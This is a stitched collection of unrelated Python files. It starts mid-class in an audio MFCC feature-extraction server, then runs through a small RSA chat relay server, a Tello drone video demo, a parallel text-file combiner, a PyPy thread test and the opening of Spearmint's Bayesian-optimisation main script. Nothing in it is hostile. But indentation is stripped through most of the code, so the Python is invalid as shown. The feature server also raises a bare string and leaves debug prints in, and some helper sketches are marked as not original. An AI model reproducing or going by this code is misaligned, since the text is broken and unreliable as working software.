self.keep_all_features = False
self.spec = False
self.mspec = False
self.single_channel_extension = ['']
self.double_channel_extension = ['_a', '_b']
# If a predefined config is chosen, apply it
if config == 'diar_16k':
self._config_diar_16k()
elif config == 'diar_8k':
self._config_diar_8k()
elif config == 'sid_8k':
self._config_sid_8k()
elif config == 'sid_16k':
self._config_sid_16k()
elif config == 'fb_8k':
self._config_fb_8k()
elif config is None:
pass
else:
raise Exception('unknown configuration value')
# Manually entered parameters are applied
if input_dir is not None:
self.input_dir = input_dir
if feature_id is not None:
self.feature_id = feature_id
if sampling_frequency is not None:
self.sampling_frequency = sampling_frequency
if lower_frequency is not None:
self.lower_frequency = lower_frequency
if higher_frequency is not None:
self.higher_frequency = higher_frequency
if linear_filters is not None:
self.linear_filters = linear_filters
if log_filters is not None:
self.log_filters = log_filters
if window_size is not None:
self.window_size = window_size
if shift is not None:
self.shift = shift
if ceps_number is not None:
self.ceps_number = ceps_number
if snr is not None:
self.snr = snr
if vad is not None:
self.vad = vad
if feat_norm is not None:
self.feat_norm = feat_norm
if log_e is not None:
self.log_e = log_e
if dct_pca is not None:
self.dct_pca = dct_pca
if dct_pca_config is not None:
self.dct_pca_config = dct_pca_config
if sdc is not None:
self.sdc = sdc
if sdc_config is not None:
self.sdc_config = sdc_config
if delta is not None:
self.delta = delta
if double_delta is not None:
self.double_delta = double_delta
if delta_filter is not None:
self.delta_filter = delta_filter
if mask is not None:
self.mask = mask
if rasta is not None:
self.rasta = rasta
if keep_all_features is not None:
self.keep_all_features = keep_all_features
if spec:
self.spec = True
if mspec:
self.mspec = True
self.cep = []
self.label = []
self.show = 'empty'
self.audio_filename = 'empty'
root, ext = os.path.splitext(self.input_dir)
if ext == '.hdf5' or ext == '.h5':
self.from_file = 'hdf5'
def __repr__(self):
ch = '\t show: {} keep_all_features: {} from_file: {}\n'.format(self.show, self.keep_all_features, self.from_file)
ch += '\t inputDir: {} \n'.format(self.input_dir)
ch += '\t lower_frequency: {} higher_frequency: {} \n'.format(self.lower_frequency, self.higher_frequency)
ch += '\t sampling_frequency: {} '.format(self.sampling_frequency)
ch += '\t linear_filters: {} or log_filters: {} \n'.format(self.linear_filters, self.log_filters)
ch += '\t ceps_number: {} window_size: {} shift: {} \n'.format(self.ceps_number, self.window_size, self.shift)
ch += '\t vad: {} snr: {} \n'.format(self.vad, self.snr)
ch += '\t feat_norm: {} rasta: {} \n'.format(self.feat_norm, self.rasta)
ch += '\t log_e: {} delta: {} double_delta: {} \n'.format(self.log_e, self.delta, self.double_delta)
return ch
def _config_diar_16k(self):
"""
12 MFCC + E, no normalization
"""
self.sampling_frequency = 16000
self.lower_frequency = 133.3333
self.higher_frequency = 6855.4976
self.linear_filters = 0
self.log_filters = 40
self.window_size = 0.025
self.shift = 0.01
self.ceps_number = 13
self.snr = 40
self.vad = None
self.feat_norm = None
self.log_e = True
self.delta = False
self.double_delta = False
self.rasta = False
self.keep_all_features = True
def _config_diar_8k(self):
"""
12 MFCC + E, no normalization
"""
self.sampling_frequency = 8000
self.lower_frequency = None
self.higher_frequency = None
self.linear_filters = 0
self.log_filters = 24
self.window_size = 0.025
self.shift = 0.01
self.ceps_number = 13
self.snr = 40
self.vad = None
self.feat_norm = None
self.log_e = True
self.delta = False
self.double_delta = False
self.rasta = False
self.keep_all_features = True
def _config_sid_16k(self):
"""
19 MFCC + E + D + DD, normalization cmvn
"""
self.sampling_frequency = 16000
self.lower_frequency = 133.3333
self.higher_frequency = 6855.4976
self.linear_filters = 0
self.log_filters = 40
self.window_size = 0.025
self.shift = 0.01
self.ceps_number = 13
self.snr = 40
self.vad = 'snr'
self.feat_norm = 'cmvn'
self.log_e = True
self.delta = True
self.double_delta = True
self.rasta = True
self.keep_all_features = False
def _config_sid_8k(self):
"""
19 MFCC + E + D + DD, normalization cmvn
"""
self.sampling_frequency = 8000
self.lower_frequency = 200
self.higher_frequency = 3800
self.linear_filters = 0
self.log_filters = 24
self.window_size = 0.025
self.shift = 0.01
self.ceps_number = 13
self.snr = 40
self.vad = 'snr'
self.feat_norm = 'cmvn'
self.log_e = True
self.delta = True
self.double_delta = True
self.rasta = True
self.keep_all_features = False
def _config_fb_8k(self):
"""
19 MFCC + E + D + DD, normalization cmvn
"""
self.sampling_frequency = 8000
self.lower_frequency = 300
self.higher_frequency = 3400
self.linear_filters = 0
self.log_filters = 40
self.window_size = 0.025
self.shift = 0.01
self.ceps_number = 0
self.snr = 40
self.vad = None
self.feat_norm = None
self.log_e = False
self.delta = False
self.double_delta = False
self.rasta = False
self.keep_all_features = True
self.mspec = True
def _config_lid_8k_sdc(self):
"""
7 MFCC + 1 - 3 - 7 SDC
"""
self.sampling_frequency = 8000
self.lower_frequency = 300
self.higher_frequency = 3400
self.linear_filters = 0
self.log_filters = 24
self.window_size = 0.025
self.shift = 0.01
self.ceps_number = 7
self.snr = 40
self.vad = 'snr'
self.feat_norm = None
self.log_e = False
self.delta = False
self.double_delta = False
self.sdc = True
self.sdc_config = (1, 3, 7)
self.rasta = False
self.keep_all_features = False
def _features(self, show):
cep = None
label = None
window_sample = int(self.window_size * self.sampling_frequency)
shift_sample = int(self.shift * self.sampling_frequency)
audio_filename = self.input_dir.format(s=show)
logging.debug('--> ' + audio_filename)
if not os.path.isfile(audio_filename):
logging.error('%s %s', audio_filename, show)
raise IOError('File ' + audio_filename + ' not found')
logging.info('read audio')
x, rate = read_audio(audio_filename, self.sampling_frequency)
if rate != self.sampling_frequency:
raise "file rate don't match the rate of the feature server configuration"
self.audio_filename = audio_filename
logging.info('size of signal: %f len %d type size %d', x.nbytes / 1024 / 1024, len(x), x.nbytes / len(x))
if x.ndim == 1:
x = x[:, np.newaxis]
for i in range(0, 200, 5):
print('==> ', i, x[i:i + 5])
channel_ext = []
channel_nb = x.shape[1]
np.random.seed(0)
#x[:, 0] += 0.0001 * numpy.random.randn(x.shape[0])
if channel_nb == 1:
channel_ext.append('')
# Random noise is added to the input signal to avoid zero frames.
elif channel_nb == 2:
channel_ext.append('_a')
channel_ext.append('_b')
#x[:, 1] += 0.0001 * numpy.random.randn(x.shape[0])
# Process channels one by one
for chan, chan_ext in enumerate(channel_ext):
l = x.shape[0]
dec = shift_sample * 250 * 25000 + window_sample
dec2 = window_sample - shift_sample
start = 0
end = min(dec, l)
while start < l - dec2:
# if end < l:
logging.info('process part : %f %f %f', start / self.sampling_frequency, end / self.sampling_frequency, l / self.sampling_frequency)
tmp = self._features_chan(show, channel_ext, x[start:end, chan])
if cep is None:
cep = []
label = []
cep.append(tmp[0])
label.append(tmp[1])
else:
cep.append(tmp[0])
label.append(tmp[1])
start = end - dec2
end = min(end + dec, l)
if cep[-1].shape[0] > 0:
logging.info('!! size of signal cep: %f len %d type size %d', cep[-1].nbytes / 1024 / 1024, len(cep[-1]), cep[-1].nbytes / len(cep[-1]))
del x
# Smooth the cluster_list and fuse the channels if more than one.
logging.info('Smooth the cluster_list and fuse the channels if more than one')
if self.vad is not None:
label = label_fusion(label)
self._normalize(label, cep)
# Keep only the required features and save the appropriate files
# which are either feature files alone or feature and label files
if not self.keep_all_features:
logging.info('no keep all')
for chan, chan_ext in enumerate(channel_ext):
cep[chan] = cep[chan][label[chan]]
label[chan] = label[chan][label[chan]]
return cep, label
def _features_chan(self, show, channel_ext, x):
"""Compelete the overwhole process of extracting the feature frames
(LFCC or MFCC) from an audio signal.
Speech Activity Detection, MFCC (or LFCC) extraction and normalization.
Can include RASTA filtering, Short Term Gaussianization, MVN and delta
computation.
        :param show: name of the file.
"""
# If the size of the signal is not enough for one frame, return zero features
if x.shape[0] < self.sampling_frequency * self.window_size:
cep_size = self.ceps_number * (1 + int(self.delta) + int(self.double_delta))\
+ int(self.mspec) * (self.linear_filters + self.log_filters)
cep = np.empty((0, cep_size))
label = np.empty((0, 1))
# Extract cepstral coefficients
else:
c = mfcc(
x,
fs=self.sampling_frequency,
lowfreq=self.lower_frequency,
maxfreq=self.higher_frequency,
nlinfilt=self.linear_filters,
nwin=self.window_size,
nlogfilt=self.log_filters,
nceps=self.ceps_number,
get_spec=self.spec,
get_mspec=self.mspec
)
print('test MFCC: cep', c[0][0:5, :])
print('test MFCC: e', c[1][0:5])
if self.ceps_number == 0 and self.mspec:
cep = c[3]
label = self._vad(c[1], x, channel_ext, show)
else:
label = self._vad(c[1], x, channel_ext, show)
cep = self._log_e(c)
cep, label = self._rasta(cep, label)
if self.delta or self.double_delta:
cep = self._delta_and_2delta(cep)
elif self.dct_pca:
cep = pca_dct(cep, self.dct_pca_config[0], self.dct_pca_config[1], self.dct_pca_config[2])
elif self.sdc:
cep = shifted_delta_cepstral(cep, d=self.sdc_config[0], P=self.sdc_config[1], k=self.sdc_config[2])
return cep, label
def _log_e(self, c):
"""If required, add the log energy as last coefficient"""
if self.log_e:
logging.info('keep log_e')
return np.hstack((c[1][:, np.newaxis], c[0]))
else:
logging.info('don\'t keep c0')
return c[0]
def _vad(self, logEnergy, x, channel_ext, show):
"""
Apply Voice Activity Detection.
:param x:
:param channel:
:param window_sample:
:param channel_ext:
:param show:
:return:
"""
label = None
if self.vad is None:
logging.info('no vad')
label = np.array([True] * logEnergy.shape[0])
elif self.vad == 'snr':
logging.info('vad : snr')
window_sample = int(self.window_size * self.sampling_frequency)
label = vad_snr(x, self.snr, fs=self.sampling_frequency, shift=self.shift, nwin=window_sample)
elif self.vad == 'energy':
logging.info('vad : energy')
label = vad_energy(logEnergy, distribNb=3, nbTrainIt=8, flooring=0.0001, ceiling=1.5, alpha=0.1)
else:
logging.warning('Wrong VAD type')
return label
def _rasta(self, cep, label):
"""
Performs RASTA filtering if required.
        The first two frames are copied from the third to keep
        the length consistent
        !!! if vad is None: label[] is empty
        :param cep: cepstral coefficients of the channel
        :param label: voice activity labels of the channel
:return:
"""
if self.rasta:
logging.info('perform RASTA %s', self.rasta)
cep = rasta_filt(cep)
cep[:2, :] = cep[2, :]
label[:2] = label[2]
return cep, label
def _delta_and_2delta(self, cep):
"""
Add deltas and double deltas.
        :param cep: a matrix of cepstral coefficients
        :return: the cepstral coefficients stacked with deltas and double deltas
"""
if self.delta:
logging.info('add delta')
delta = compute_delta(cep, filt=self.delta_filter)
cep = np.column_stack((cep, delta))
if self.double_delta:
logging.info('add delta delta')
double_delta = compute_delta(delta, filt=self.delta_filter)
cep = np.column_stack((cep, double_delta))
return cep
def _normalize(self, label, cep):
"""
Normalize features in place
:param label:
:return:
"""
# Perform feature normalization on the entire session.
if self.feat_norm is None:
logging.info('no normalization')
pass
elif self.feat_norm == 'cms':
logging.info('cms normalization')
for chan, c in enumerate(cep):
cms(cep[chan], label[chan])
elif self.feat_norm == 'cmvn':
logging.info('cmvn normalization')
for chan, c in enumerate(cep):
cmvn(cep[chan], label[chan])
elif self.feat_norm == 'stg':
logging.info('stg normalization')
for chan, c in enumerate(cep):
stg(cep[chan], label=label[chan])
elif self.feat_norm == 'cmvn_sliding':
logging.info('sliding cmvn normalization')
for chan, c in enumerate(cep):
cep_sliding_norm(cep[chan], win=301, center=True, reduce=True)
elif self.feat_norm == 'cms_sliding':
logging.info('sliding cms normalization')
for chan, c in enumerate(cep):
cep_sliding_norm(cep[chan], win=301, center=True, reduce=False)
else:
logging.warning('Wrong feature normalisation type')
def load(self, show, id=None):
"""
Load a cep from audio or mfcc file. This method loads all channels
available in the file.
        :param show: the name of the show to load
:return: the cep array and the label array
"""
# test if features is already computed
if self.show == show:
return self.cep, self.label
self.show = show
if self.from_file == 'audio':
logging.debug('compute MFCC: ' + show)
logging.debug(self.__repr__())
self.cep, self.label = self._features(show)
elif self.from_file == 'hdf5':
logging.debug('load hdf5: ' + show)
input_filename = self.input_dir.format(s=show)
with h5py.File(input_filename, "r") as hdf5_input_fh:
logging.debug('*** ' + input_filename + ' ' + show)
vad = True
if self.vad is None:
vad = False
cep, label = read_hdf5(hdf5_input_fh, show, feature_id=self.feature_id, label=vad)
self.cep = [cep]
if label is None:
self.label = [np.array([True] * self.cep[0].shape[0])]
else:
self.label = [label]
else:
raise Exception('unknown from_file value')
if self.mask is not None:
self.cep[0] = self._mask(self.cep[0])
if not self.keep_all_features:
logging.debug('!!! no keep all feature !!!')
self.cep[0] = self.cep[0][self.label[0]]
self.label[0] = [np.array([True] * self.cep[0].shape[0])]
return self.cep, self.label
def _mask(self, cep):
"""
keep only the MFCC index present in the filter list
:param cep:
:return: return the list of MFCC given by filter list
"""
if len(self.mask) == 0:
raise Exception('filter list is empty')
logging.debug('applied mask')
return cep[:, self.mask]
def save(self, show, filename, mfcc_format, and_label=True):
"""
Save the cep array in file
        :param show: the name of the show to save (loaded if needed)
        :param filename: the filename of the mfcc file or a list of 2 filenames
for the case of double channel files
:param mfcc_format: format of the mfcc file taken in values
['pickle', 'spro4', 'htk']
:param and_label: boolean, if True save label files
:raise: Exception if feature format is unknown
"""
self.load(show)
hdf5_ouput_fh = h5py.File(filename, "w")
logging.debug('save hdf5: ' + show)
#write_hdf5(show, fh, feat, feat_type='ceps', label=None )
write_hdf5(show, hdf5_ouput_fh, self.cep[0], label=self.label[0])
hdf5_ouput_fh.close()
@process_parallel_lists
def save_list(self, audio_file_list, feature_file_list, mfcc_format, feature_dir, feature_file_extension, and_label=False, numThread=1):
"""
Function that takes a list of audio files and extract features
        :param audio_file_list: an array of strings containing the names of the audio
            files to load
:param feature_file_list: list of feature files to save, should correspond to the input audio_file_list
:param mfcc_format: format of the feature files to save, could be spro4, htk, pickle
:param feature_dir: directory where to save the feature files
:param feature_file_extension: extension of the feature files to save
:param and_label: boolean, if True save the label files
        :param numThread: number of parallel processes to run
"""
logging.info(self)
for audio_file, feature_file in zip(audio_file_list, feature_file_list):
cep_filename = os.path.join(feature_dir, feature_file + feature_file_extension)
self.save(audio_file, cep_filename, mfcc_format, and_label)
def dim(self):
if self.show != 'empty':
return self.cep[0].shape[1]
dim = self.ceps_number
if self.log_e:
dim += 1
if self.delta:
dim *= 2
if self.double_delta:
dim *= 2
logging.warning('cep dim computed using featureServer parameters')
return dim
def save_parallel(self, input_audio_list, output_feature_list, mfcc_format, feature_dir, feature_file_extension, and_label=False, numThread=1):
"""
Extract features from audio file using parallel computation
        :param input_audio_list: an array of strings containing the names
            of the audio files to process
        :param output_feature_list: an array of strings containing the
            names of the feature files to save
:param mfcc_format: format of the output feature files, could be spro4, htk, pickle
:param feature_dir: directory where to save the feature files
:param feature_file_extension: extension of the feature files to save
:param and_label: boolean, if True save the label files
        :param numThread: number of parallel processes to run
"""
# Split the features to process for multi-threading
loa = np.array_split(input_audio_list, numThread)
lof = np.array_split(output_feature_list, numThread)
jobs = []
multiprocessing.freeze_support()
for idx, feat in enumerate(loa):
p = multiprocessing.Process(target=self.save_list, args=(loa[idx], lof[idx], mfcc_format, feature_dir, feature_file_extension, and_label))
jobs.append(p)
p.start()
for p in jobs:
p.join()
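    # Both load_and_stack variants below share this worker: file names are pulled from
    # input_queue, the corresponding cepstra are pushed to an output queue, and a None
    # entry acts as a poison pill telling the worker to forward None and stop.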
def _load_and_stack_worker(self, input_queue, output):
"""Load a list of feature files into a Queue object
:param input_queue: a Queue object
:param output: a list of Queue objects to fill
"""
while True:
next_task = input_queue.get()
if next_task is None:
# Poison pill means shutdown
output.put(None)
input_queue.task_done()
break
# check which channel to keep from the file
if next_task.endswith(self.double_channel_extension[0]) and (self.from_file == 'audio'):
next_task = next_task[:-len(self.double_channel_extension[0])]
output.put(self.load(next_task)[0][0])
if next_task.endswith(self.double_channel_extension[1]) and self.from_file == 'audio':
next_task = next_task[:-len(self.double_channel_extension[1])]
output.put(self.load(next_task)[0][1])
else:
cep = self.load(next_task)[0][0]
output.put(cep)
input_queue.task_done()
def load_and_stack(self, fileList, numThread=1):
"""Load a list of feature files and stack them in a unique ndarray.
        The list of files to load is split into sublists processed in parallel
        :param fileList: a list of files to load
        :param numThread: number of parallel worker processes (optional, default is 1)
"""
queue_in = multiprocessing.JoinableQueue(maxsize=len(fileList) + numThread)
queue_out = []
# Start worker processes
jobs = []
for i in range(numThread):
queue_out.append(multiprocessing.Queue())
p = multiprocessing.Process(target=self._load_and_stack_worker, args=(queue_in, queue_out[i]))
jobs.append(p)
p.start()
# Submit tasks
for task in fileList:
queue_in.put(task)
for task in range(numThread):
queue_in.put(None)
# Wait for all the tasks to finish
queue_in.join()
output = []
for q in queue_out:
while True:
data = q.get()
if data is None:
break
output.append(data)
for p in jobs:
p.join()
all_cep = np.concatenate(output, axis=0)
return all_cep
def load_and_stack_threading(self, fileList, numThread=1):
"""Load a list of feature files and stack them in a unique ndarray.
        The list of files to load is split into sublists processed in parallel
        :param fileList: a list of files to load
        :param numThread: number of worker threads (optional, default is 1)
"""
queue_in = multiprocessing.JoinableQueue(maxsize=len(fileList) + numThread)
queue_out = []
# Start worker processes
jobs = []
for i in range(numThread):
queue_out.append(Queue.Queue())
p = threading.Thread(target=self._load_and_stack_worker, args=(queue_in, queue_out[i]))
jobs.append(p)
p.start()
# Submit tasks
for task in fileList:
queue_in.put(task)
for task in range(numThread):
queue_in.put(None)
# Wait for all the tasks to finish
queue_in.join()
output = []
for q in queue_out:
while True:
data = q.get()
if data is None:
break
output.append(data)
for p in jobs:
p.join()
all_cep = np.concatenate(output, axis=0)
return all_cep
def mean_std(self, filename):
feat = self.load(filename)[0][0]
return feat.shape[0], feat.sum(axis=0), np.sum(feat**2, axis=0)
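# Hedged usage sketch (not from the original SIDEKIT sources): driving FeaturesServer_test
# to extract features for one show and save them to HDF5. The input template, output path
# and show name ("spk001") are hypothetical placeholders.
def _example_extract_one(show="spk001"):
    server = FeaturesServer_test(
        input_dir="./audio/{s}.wav",  # expanded with input_dir.format(s=show) in _features()
        config="sid_8k",              # 13 MFCC + log-E + delta/double-delta, CMVN, SNR-based VAD
    )
    cep, label = server.load(show)    # lists of cepstral arrays and VAD labels
    server.save(show, "./feat/{}.h5".format(show), mfcc_format="hdf5")
    return cep, label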
|
server.py
|
#!/usr/bin/python3
import socket
import threading
from Crypto.PublicKey import RSA
class Server:
def __init__(self):
self.PORT = 1423
self.PUBLIC_TEXT = "Baglandi."
self.CODING = "ISO-8859-1"
self.TEXTCODE = "UTF-8"
self.sock = socket.socket()
self.sock.bind(('', self.PORT))
self.sock.listen()
self.clients = []
threading.Thread(target=self.invite).start()
    def start_listen(self, client):
        # Protocol: the first message is "<name>:<PEM public key>" and registers the client;
        # every later message is "<target name>:<payload>" and gets relayed to the other clients.
        while True:
            data = self.listen(client.socket)
            if data == '':
                continue
            ad = data.split(':')[0]
            veri = ''.join(data.split(':')[1:]).encode(self.CODING)
            try:
                outer_key = RSA.importKey(veri)
                print("Public key received...")
                client.set_key(outer_key, ad)
            except Exception:
                # not a key, so treat it as a chat message addressed to "ad"
                self.send(veri, client, ad)
def encode(self, text):
try:
return text.encode(self.TEXTCODE)
except UnicodeEncodeError:
return text.encode(self.CODING)
def send(self,data,client,target=None):
sender = self.find_sender(target)
veri = sender.key.encrypt(self.encode(client.name)+ b'->' + data, b'')[0]
for user in self.clients:
if user.name == client.name:
continue
user.send(veri)
def find_sender(self,name):
for client in self.clients:
if client.name == name:
return client
def invite(self):
while True:
conn,add = self.sock.accept()
client = Client(conn,add)
self.clients.append(client)
print("Kullanıcı katıldı.")
threading.Thread(target=self.start_listen, args=(client,)).start()
def listen(self,connection):
data = connection.recv(16384).decode(self.CODING)
return data
class Client:
def __init__(self,connection,address):
self.socket = connection
self.key = None
self.name = None
self.address = address
def set_key(self,key,ad):
if self.key != None:
return
self.key = key
self.name = ad
def send(self,data):
self.socket.send(data)
server = Server()
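# A minimal client-side sketch (hypothetical, for illustration only; it belongs in a
# separate client script, not in this server module). It follows the protocol handled by
# start_listen() above: the first message is "<name>:<PEM public key>" so the server can
# register the key via client.set_key(); later messages are relayed to the other clients
# encrypted with their public keys.
#
#     import socket
#     from Crypto.PublicKey import RSA
#
#     key = RSA.generate(2048)
#     s = socket.socket()
#     s.connect(("127.0.0.1", 1423))
#     pem = key.publickey().exportKey().decode("ISO-8859-1")
#     s.send(("alice:" + pem).encode("ISO-8859-1"))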
|
vc.py
|
#
# Tello Python3 Control Demo
#
# http://www.ryzerobotics.com/
#
# 1/1/2018
#
# Modified by MPS
#
import threading
import socket
import time
import cv2
host = ''
port = 9000
locaddr = (host, port)
# Create a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
tello_address = ('192.168.10.1', 8889)
sock.bind(locaddr)
def recv():
while True:
try:
data, server = sock.recvfrom(1518)
print(data.decode(encoding="utf-8"))
except Exception:
print('\nExit . . . RECV\n')
break
print('\r\n\r\nTello Python3 Demo.\r\n')
print('Tello: command takeoff land flip forward back left right \r\n up down cw ccw speed speed?\r\n')
print('end -- quit demo.\r\n')
#recvThread create
recvThread = threading.Thread(target=recv)
recvThread.start()
sock.sendto(b'command', tello_address)
print('command ok')
time.sleep(0.5)
sock.sendto(b'streamon', tello_address)
print('stream on')
time.sleep(1)
sock.close()
cap = cv2.VideoCapture("udp://%s:%s?overrun_nonfatal=1&fifo_size=50000000" % ('192.168.10.1', '11111'))
print('start cap')
while True:
try:
ret, frame = cap.read()
if ret:
cv2.imshow('tello', cv2.resize(frame, (360, 240)))
cv2.waitKey(1)
except KeyboardInterrupt:
cv2.destroyAllWindows()
cap.release()
print('\nExit . . .\n')
break
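# A minimal sketch (not part of the original demo) of sending the flight commands listed
# in the help text above. It assumes the drone is still in SDK mode from the earlier
# b'command' message and uses a fresh UDP socket, since `sock` was closed before the
# video capture started:
#
#     ctrl = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#     ctrl.sendto(b'takeoff', tello_address)
#     time.sleep(5)
#     ctrl.sendto(b'land', tello_address)
#     ctrl.close()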
|
combine.py
|
import os
import time
import glob
import asyncio
import aiofiles
import multiprocessing as mp
async def write_major(major_queue:mp.Queue):
async with aiofiles.open("Major_Notes.txt", "w") as txt_write:
# both reader processes push an "END" sentinel, so stop only after seeing two of them
remaining_ends = 2
while remaining_ends > 0:
# queue.get() already blocks until an item is available
txt_str = major_queue.get()
if txt_str == "END":
remaining_ends -= 1
continue
await txt_write.write(txt_str)
print("Complete Major Notes Processing")
async def write_minor(minor_queue:mp.Queue):
async with aiofiles.open("Minor_Notes.txt", "w") as txt_write:
# both reader processes push an "END" sentinel, so stop only after seeing two of them
remaining_ends = 2
while remaining_ends > 0:
# queue.get() already blocks until an item is available
txt_str = minor_queue.get()
if txt_str == "END":
remaining_ends -= 1
continue
await txt_write.write(txt_str)
print("Complete Minor Notes Processing")
async def read_txt(pid:int, txt_files:list, major_queue:mp.Queue, minor_queue:mp.Queue):
num_files = len(txt_files)
if pid == 0:
process_files = txt_files[:num_files//2]
elif pid == 1:
process_files = txt_files[num_files//2:]
else:
print("Code designed only for 2 processes to read txt files")
exit(0)
for txt_file in process_files:
txt_str = ""
try:
async with aiofiles.open(txt_file, "r") as txt_read:
mood = await txt_read.readline()
txt_str = await txt_read.read()
if mood == "major\n":
major_queue.put(txt_str)
elif mood == "minor\n":
minor_queue.put(txt_str)
else:
print("Read Skipped ! " + txt_file)
continue
except:
print("Read Failed ! " + txt_file)
continue
major_queue.put("END")
minor_queue.put("END")
def get_TXTpaths(current_folder:str):
os.chdir(current_folder)
txt_files = glob.glob("**/*.txt", recursive=True)
return txt_files
def process(func, *args):
asyncio.run(func(*args))
def read_seq(txt_files:list):
major_txt = ""
minor_txt = ""
for txt_file in txt_files:
txt_str = ""
try:
with open(txt_file, "r") as txt_read:
mood = txt_read.readline()
txt_str = txt_read.read()
if mood == "major\n":
major_txt += txt_str
elif mood == "minor\n":
minor_txt += txt_str
else:
print("Read Skipped ! " + txt_file)
continue
except:
print("Read Failed ! " + txt_file)
continue
with open("Major_Notes.txt", "w") as txt_write:
txt_write.write(major_txt)
with open("Minor_Notes.txt", "w") as txt_write:
txt_write.write(minor_txt)
def main():
current_folder = os.getcwd()
txt_files = get_TXTpaths(current_folder)
print("Start Parallel Combination !")
start_t = time.time()
major_queue = mp.Queue()
minor_queue = mp.Queue()
p1_read_txt = mp.Process(target=process, args=(read_txt, 0, txt_files, major_queue, minor_queue))
p2_read_txt = mp.Process(target=process, args=(read_txt, 1, txt_files, major_queue, minor_queue))
p3_write_major = mp.Process(target=process, args=(write_major, major_queue))
p4_write_minor = mp.Process(target=process, args=(write_minor, minor_queue))
processes = [p1_read_txt, p2_read_txt, p3_write_major, p4_write_minor]
for p in processes:
p.start()
for p in processes:
p.join()
print("End Parallel Combination in: {:.2f} sec!".format(time.time()-start_t))
print("Start Serial Combination !")
start_t = time.time()
read_seq(txt_files)
print("End Serial Combination in: {:.2f} sec!".format(time.time()-start_t))
if __name__ == "__main__":
main()
|
test_thread.py
|
import py
import thread
import threading
from pypy.module.thread.ll_thread import allocate_ll_lock
from pypy.module.cpyext.test.test_api import BaseApiTest
from pypy.module.cpyext.test.test_cpyext import AppTestCpythonExtensionBase
class TestPyThread(BaseApiTest):
def test_get_thread_ident(self, space, api):
results = []
def some_thread():
res = api.PyThread_get_thread_ident()
results.append((res, thread.get_ident()))
some_thread()
assert results[0][0] == results[0][1]
th = threading.Thread(target=some_thread, args=())
th.start()
th.join()
assert results[1][0] == results[1][1]
assert results[0][0] != results[1][0]
def test_acquire_lock(self, space, api):
assert hasattr(api, 'PyThread_acquire_lock')
lock = api.PyThread_allocate_lock()
assert api.PyThread_acquire_lock(lock, 1) == 1
assert api.PyThread_acquire_lock(lock, 0) == 0
api.PyThread_free_lock(lock)
def test_release_lock(self, space, api):
assert hasattr(api, 'PyThread_acquire_lock')
lock = api.PyThread_allocate_lock()
api.PyThread_acquire_lock(lock, 1)
api.PyThread_release_lock(lock)
assert api.PyThread_acquire_lock(lock, 0) == 1
api.PyThread_free_lock(lock)
class AppTestThread(AppTestCpythonExtensionBase):
def test_tls(self):
module = self.import_extension('foo', [
("create_key", "METH_NOARGS",
"""
return PyInt_FromLong(PyThread_create_key());
"""),
("test_key", "METH_O",
"""
int key = PyInt_AsLong(args);
if (PyThread_get_key_value(key) != NULL) {
PyErr_SetNone(PyExc_ValueError);
return NULL;
}
if (PyThread_set_key_value(key, (void*)123) < 0) {
PyErr_SetNone(PyExc_ValueError);
return NULL;
}
if (PyThread_get_key_value(key) != (void*)123) {
PyErr_SetNone(PyExc_ValueError);
return NULL;
}
Py_RETURN_NONE;
"""),
])
key = module.create_key()
assert key > 0
# Test value in main thread.
module.test_key(key)
raises(ValueError, module.test_key, key)
# Same test, in another thread.
result = []
import thread, time
def in_thread():
try:
module.test_key(key)
raises(ValueError, module.test_key, key)
except Exception, e:
result.append(e)
else:
result.append(True)
thread.start_new_thread(in_thread, ())
while not result:
print "."
time.sleep(.5)
assert result == [True]
|
main.py
|
# Copyright (C) 2012 Jasper Snoek, Hugo Larochelle and Ryan P. Adams
#
# This code is written for research and educational purposes only to
# supplement the paper entitled
# "Practical Bayesian Optimization of Machine Learning Algorithms"
# by Snoek, Larochelle and Adams
# Advances in Neural Information Processing Systems, 2012
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import optparse
import tempfile
import datetime
import multiprocessing
import importlib
import time
import imp
import os
import sys
import re
import signal
import socket
try: import simplejson as json
except ImportError: import json
# TODO: this shouldn't be necessary when the project is installed like a normal
# python lib. For now though, this lets you symlink to spearmint from your path and run it
# from anywhere.
sys.path.append(os.path.dirname(os.path.realpath(__file__)))
from ExperimentGrid import *
from helpers import *
from runner import job_runner
# Use a global for the web process so we can kill it cleanly on exit
web_proc = None
# There are two things going on here. There are "experiments", which are
# large-scale things that live in a directory and in this case correspond
# to the task of minimizing a complicated function. These experiments
# contain "jobs" which are individual function evaluations. The set of
# all possible jobs, regardless of whether they have been run or not, is
# the "grid". This grid is managed by an instance of the class
# ExperimentGrid.
#
# The spearmint.py script can run in two modes, which reflect experiments
# vs jobs. When run with the --run-job argument, it will try to run a
# single job. This is not meant to be run by hand, but is intended to be
# run by a job queueing system. Without this argument, it runs in its main
# controller mode, which determines the jobs that should be executed and
# submits them to the queueing system.
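# Illustrative invocations (not from the original header), using the options defined in
# parse_args() below; the experiment path is a placeholder:
#
#   spearmint --method=GPEIOptChooser --max-concurrent=2 myexpt/config.pb   # controller mode
#   spearmint --run-job=<job-file> myexpt/config.pb                         # wrapper mode, normally
#                                                                           # invoked by the queueing system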
def parse_args():
parser = optparse.OptionParser(usage="\n\tspearmint [options] <experiment/config.pb>")
parser.add_option("--max-concurrent", dest="max_concurrent",
help="Maximum number of concurrent jobs.",
type="int", default=1)
parser.add_option("--max-finished-jobs", dest="max_finished_jobs",
type="int", default=10000)
parser.add_option("--method", dest="chooser_module",
help="Method for choosing experiments [SequentialChooser, RandomChooser, GPEIOptChooser, GPEIOptChooser, GPEIperSecChooser, GPEIChooser]",
type="string", default="GPEIOptChooser")
parser.add_option("--driver", dest="driver",
help="Runtime driver for jobs (local, or sge)",
type="string", default="local")
parser.add_option("--method-args", dest="chooser_args",
help="Arguments to pass to chooser module.",
type="string", default="")
parser.add_option("--grid-size", dest="grid_size",
help="Number of experiments in initial grid.",
type="int", default=20000)
parser.add_option("--grid-seed", dest="grid_seed",
help="The seed used to initialize initial grid.",
type="int", default=1)
parser.add_option("--run-job", dest="job",
help="Run a job in wrapper mode.",
type="string", default="")
parser.add_option("--polling-time", dest="polling_time",
help="The time in-between successive polls for results.",
type="float", default=3.0)
